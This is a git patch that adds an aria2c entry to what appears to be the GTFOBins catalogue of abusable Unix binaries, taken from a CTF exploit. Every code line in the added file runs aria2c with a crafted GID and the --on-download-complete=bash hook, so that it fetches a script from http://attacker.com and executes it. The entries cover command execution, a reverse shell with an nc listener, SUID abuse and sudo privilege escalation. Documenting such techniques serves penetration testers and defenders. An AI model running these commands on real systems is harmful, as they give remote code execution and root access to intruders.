From 214f7786c0451c3a160a4e35343e5af66ab58a9b Mon Sep 17 00:00:00 2001
From: HugoDelval <hugodelval@gmail.com>
Date: Fri, 7 Sep 2018 11:53:15 +0200
Subject: [PATCH] Add aria2c

Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit
---
 _gtfobins/aria2c.md | 13 +++++++++++++
 1 file changed, 13 insertions(+)
 create mode 100644 _gtfobins/aria2c.md

diff --git a/_gtfobins/aria2c.md b/_gtfobins/aria2c.md
new file mode 100644
index 0000000..1548e08
--- /dev/null
+++ b/_gtfobins/aria2c.md
@@ -0,0 +1,13 @@
+---
+functions:
+  execute-interactive:
+    - description: "By default the ``--on-download-complete`` option execute a given binary with 3 parameters: https://aria2.github.io/manual/en/html/aria2c.html?highlight=download%20complete#event-hook We can control the first one (GID) which leads to a command execution"
+    - code: "aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa # aaaaaaaaaaaaaaaa file contains a shell script"
+  reverse-shell-interactive:
+    - description: Run ``nc -lvp 12345`` on the attacker box to receive the shell.
+    - code: "aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa # aaaaaaaaaaaaaaaa file contains the reverse shell payload (in bash)"
+  suid-enabled:
+    - code: "./aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa"
+  sudo-enabled:
+    - code: "sudo aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa"
+---